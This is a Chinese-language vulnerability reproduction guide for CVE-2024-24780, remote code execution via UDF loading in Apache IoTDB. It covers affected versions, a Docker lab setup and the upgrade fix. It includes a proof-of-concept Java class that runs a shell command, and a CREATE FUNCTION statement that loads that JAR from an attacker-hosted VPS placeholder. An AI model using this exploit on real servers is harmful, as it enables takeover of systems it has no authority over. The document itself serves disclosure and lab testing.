Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780

漏洞描述

Apache IoTDB(物联网数据库)是支持收集、存储、管理与分析物联网时序数据的软件系统。CVE-2024-24780 中,攻击者在具有创建 UDF 的权限下可构造恶意请求造成远程代码执行,控制服务器。

IoTDB 支持两种方式加载 UDF(用户自定义函数):

攻击者可以通过 URI 自动加载的方式,指定一个恶意远程 URI。IoTDB 将从恶意远程 URI 加载包含恶意代码的 JAR 包,并分发到集群中的各个节点执行。

参考链接:

漏洞影响

1.0.0 <= Apache IoTDB < 1.3.4

环境搭建

启动 IoTDB

docker-compose.yml

services:
  iotdb:
    image: apache/iotdb:1.2.0-standalone
    container_name: iotdb
    ports:
      - "6667:6667"
      - "31999:31999"
      - "8181:8181"

执行如下命令启动一个 Apache IoTDB 1.2.0 版本的服务器:

docker-compose up -d

查看启动情况:

docker ps

安装 Cli 命令行

下载 apache-iotdb-1.2.0-cli-bin.zip

wget https://archive.apache.org/dist/iotdb/1.2.0/apache-iotdb-1.2.0-cli-bin.zip
unzip apache-iotdb-1.2.0-cli-bin.zip

启动 Cli,命令行客户端是交互式的,如果一切就绪,我们可以看到欢迎标志和声明:

cd apache-iotdb-1.2.0-cli-bin/
sbin/start-cli.sh -h your-ip -p 6667 -u root -pw root

漏洞复现

编写类 org.example.EvilClass,将其编译为 poc.jar,将编译好的 jar 文件上传到 vps 进行托管。此处我们的恶意类中执行的命令是 touch /tmp/awesome_poc

package org.example;

public class EvilClass {
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/awesome_poc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

通过 URI 自动加载,在 IoTDB 中注册恶意 UDF:

CREATE FUNCTION evilFunc AS 'org.example.EvilClass' USING URI 'http://<your-vps-ip>/poc.jar';

IoTDB 会从我们的 vps 下载 poc.jar,加载恶意类并执行命令 。可以看到,touch /tmp/awesome_poc 已经执行成功:

漏洞修复

升级至 1.3.4 及以上版本。